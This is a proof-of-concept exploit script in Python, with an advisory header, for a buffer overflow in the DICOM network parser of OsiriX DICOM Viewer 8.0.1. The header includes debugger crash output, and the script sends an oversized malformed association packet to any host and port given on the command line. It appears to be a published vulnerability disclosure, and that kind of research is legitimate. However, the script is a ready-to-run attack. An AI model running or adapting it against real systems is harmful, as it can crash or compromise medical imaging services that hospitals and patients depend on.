#!/usr/bin/env python# -*- coding: utf8 -*-### OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability### Vendor: Pixmeo Sarl# Product web page: http://www.osirix-viewer.com# Affected version: OsiriX 8.0.1## Summary: With high performance and an intuitive interactive user interface, OsiriX MD is# the most widely used DICOM viewer in the world. It is the result of more than 10 years of# research and development in digital imaging. It fully supports the DICOM standard for an# easy integration in your workflow environment and an open platform for development of# processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive# innovative technique for 3D and 4D navigation and a complete integration with any PACS.# OsiriX MD supports 64-bit computing and multithreading for the best performances on the# most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled.## Summary2: OsiriX is an image processing application for Mac dedicated to DICOM images# (".dcm" / ".DCM" extension) produced by equipment (MRI, CT, PET, PET-CT, ...).# Osirix is complementary to existing viewers, in particular to nuclear medicine viewers.## Desc: The vulnerability is caused due to the usage of vulnerable collection of libraries that# are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL.# Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length# of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can# overflow the stack and the heap of the process when sending large array of bytes to the presentation# context item length segment of the DICOM standard, potentially resulting in remote code execution# and/or denial of service scenario.## -------------------------------------------------------------------------------------## (lldb)# Process 65202 stopped# * thread #20: tid = 0x2c5fcc, 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fb5af00fda1)# frame #0: 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833# OsiriX Lite`parseAssociate:# ->0x108978441 <+833>: movzbl (%r10), %eax# 0x108978445 <+837>: cmpl $0x40, %eax# 0x108978448 <+840>: movq -0x200(%rbp), %rcx# 0x10897844f <+847>: je 0x108978513 ; <+1043># (lldb) bt# * thread #19: tid = 0x2f6189, 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fab8ac000a1)# * frame #0: 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833# frame #1: 0x0000000102fe4363 OsiriX Lite`AE_6_ExamineAssociateRequest(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, void*) + 339# frame #2: 0x0000000102fe14ca OsiriX Lite`PRV_StateMachine(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, int, void*) + 314# frame #3: 0x0000000102fdae9c OsiriX Lite`DUL_ReceiveAssociationRQ(void**, DUL_BLOCKOPTIONS, int, DUL_ASSOCIATESERVICEPARAMETERS*, void**, int) + 4348# frame #4: 0x0000000102facf1e OsiriX Lite`ASC_receiveAssociation(T_ASC_Network*, T_ASC_Association**, long, void**, unsigned int*, bool, DUL_BLOCKOPTIONS, int) + 462# frame #5: 0x0000000102c5f28f OsiriX Lite`DcmQueryRetrieveSCP::waitForAssociation(T_ASC_Network*) + 207# frame #6: 0x0000000102c3f9c7 OsiriX Lite`-[DCMTKQueryRetrieveSCP run] + 4999# frame #7: 0x0000000102987a37 OsiriX Lite`-[AppController startSTORESCP:] + 519# frame #8: 0x00007fff975b030d Foundation`__NSThread__start__ + 1243# frame #9: 0x00007fffab021aab libsystem_pthread.dylib`_pthread_body + 180# frame #10: 0x00007fffab0219f7 libsystem_pthread.dylib`_pthread_start + 286# frame #11: 0x00007fffab021221 libsystem_pthread.dylib`thread_start + 13# (lldb) register read# General Purpose Registers:#rax = 0x0000000000000103#rbx = 0x00000001044c18d8OsiriX Lite`ECC_Normal#rcx = 0x00006100002e6200#rdx = 0x000000000001ad41#rdi = 0x00000001044c18d8OsiriX Lite`ECC_Normal#rsi = 0x00006100002e6200#rbp = 0x0000700005a4a670#rsp = 0x0000700005a4a420# r8 = 0x0000000000000103# r9 = 0x00000000fb40cfc6#r10 = 0x00007fab8ac000a1#r11 = 0x0000000000000041#r12 = 0x0000700005a4a6b8#r13 = 0x00000001044c18f0OsiriX Lite`EC_Normal#r14 = 0x00000001044c18d8OsiriX Lite`ECC_Normal#r15 = 0x0000000000008014#rip = 0x0000000102fe8441OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833# rflags = 0x0000000000010286# cs = 0x000000000000002b# fs = 0x0000000000000000# gs = 0x0000000000000000## -------------------------------------------------------------------------------------## Tested on: OS X 10.12.2 (Sierra)#OS X 10.12.1 (Sierra)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2016-5382# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5382.php## https://tools.ietf.org/html/rfc3240# https://github.com/commontk/DCMTK/commit/1b6bb76## 29.11.2016#
import sys, socket
hello = ('\x01\x00\x00\x00\x80\x71\x00\x01\x00\x00\x4f\x52\x54\x48''\x41\x4e\x43\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4a\x4f''\x58\x59\x50\x4f\x58\x59\x21\x00\x00\x00\x00\x00\x00\x00''\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00''\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00''\x00\x00\x00\x00\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34''\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e''\x31\x20\x00\x80\x00')
bye = ('\x50\x00\x00\x0c\x51\x00\x00\x04\x00\x00\x07\xde''\x52\x00\x00\x00')
buffer = '\x41\x42\x43\x44'* 10000
if len(sys.argv) < 3:
print '\nUsage: '+sys.argv[0]+' <target> <port>'
print 'Example: '+sys.argv[0]+' 172.19.0.214 11112\n'
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))
s.settimeout(251)
s.send(hello+buffer+bye)
s.close
